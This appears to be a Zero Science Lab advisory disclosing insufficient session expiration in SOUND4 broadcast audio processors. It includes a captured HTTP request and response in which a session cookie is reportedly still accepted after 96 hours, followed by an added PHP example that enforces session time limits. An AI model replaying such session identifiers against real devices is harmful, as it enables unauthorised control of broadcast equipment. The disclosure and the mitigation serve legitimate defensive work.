SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Insufficient Session Expiration


Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: 4.1.102

Summary: The SOUND4 IMPACT introduces an innovative process - mono and
stereo parts of the signal are processed separately to obtain perfect
consistency in terms of both sound and level. Therefore, in moving
reception, when the FM receiver switches from stereo to mono and back to
stereo, the sound variations and changes in level are reduced by over 90%.
In the SOUND4 IMPACT processing chain, the stereo expander can be used
substantially without any limitations.

With its advanced functionalities and impressive versatility, SOUND4 PULSE
gives clients the ultimate price-performance ratio, providing much more
than just a processor. Flexible and powerful, it ensures perfect sound
quality and full compatibility with radio broadcasting standards and can
be used simultaneously for FM and HD, DAB, DRM or streaming.

SOUND4 FIRST provides all the most important functionalities you need in
an FM/HD processor and sets the bar high both in terms of performance and
affordability. Designed to deliver a sound of uncompromising quality, this
tool gives you 2-band processing, a digital stereo generator and an IMPACT
Clipper.

Desc: The application suffers from insufficient session expiration. This
occurs when the web application permits an attacker to reuse old session
credentials or session IDs for authorization. Insufficient session
expiration increases the device's exposure to attacks that can steal or
reuse users' session identifiers.

Tested on: Apache/2.4.25 (Unix)
           OpenSSL/1.0.2k
           PHP/7.1.1
           GNU/Linux 5.10.43 (armv7l)
           GNU/Linux 4.9.228 (armv7l)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2022-5724
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5724.php


26.09.2022

--


Session valid after 96 hours:

POST /checklogin.php HTTP/1.1
Host: RADIO
Cookie: PHPSESSID=q9rooqkl3kl20aianmveimu23q; monitor-mp3-bitrate=128; monitor-volume=1; settings_accordion_active=3; netdiagsaccordion_last=0
Content-Length: 34
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://RADIO
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://RADIO/linkandshare.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

session=q9rooqkl3kl20aianmveimu23q


HTTP/1.1 200 OK
Date: Sat, 03 Jan 1970 11:13:19 GMT
Server: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1
X-Powered-By: PHP/7.1.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: User-Agent
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

0
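
Mitigation sketch for the condition described under Desc: bound the session lifetime on the server at every request, with both an idle and an absolute limit. This is an added example, not part of the original advisory and not the vendor's code. The limits, the 'created'/'last_seen' session keys and all function names are assumptions.

```php
<?php
// Added example (assumed names and limits): server-side session lifetime guard.
const IDLE_LIMIT     = 15 * 60;      // assumed: 15 minutes without a request
const ABSOLUTE_LIMIT = 8 * 60 * 60;  // assumed: 8 hours since login

// Call once after credentials have been verified.
function start_authenticated_session(int $now): void
{
    session_regenerate_id(true);     // new ID; the pre-login ID is deleted
    $_SESSION['created']   = $now;
    $_SESSION['last_seen'] = $now;
}

// Pure check over the session array; refreshes last_seen when still live.
function session_is_live(array &$s, int $now): bool
{
    if (!isset($s['created'], $s['last_seen'])) {
        return false;                // never authenticated
    }
    // Fail closed if the clock moved backwards. The captured response above
    // carries a 1970 Date header, so wall-clock time may jump on this device.
    if ($now < $s['last_seen'] || $now < $s['created']) {
        return false;
    }
    if ($now - $s['last_seen'] > IDLE_LIMIT || $now - $s['created'] > ABSOLUTE_LIMIT) {
        return false;
    }
    $s['last_seen'] = $now;
    return true;
}

// Call at the top of every authenticated endpoint.
function require_live_session(): void
{
    ini_set('session.use_strict_mode', '1');               // reject unknown IDs
    ini_set('session.gc_maxlifetime', (string) ABSOLUTE_LIMIT);
    session_start();
    if (session_is_live($_SESSION, time())) {
        return;
    }
    $_SESSION = [];                                         // drop server-side state
    $p = session_get_cookie_params();
    setcookie(session_name(), '', 1, $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    session_destroy();
    http_response_code(401);
    exit;
}
```

With a guard like this in place, replaying a cookie after the limits have passed yields a 401 and the server-side session data is destroyed, regardless of what the client sends.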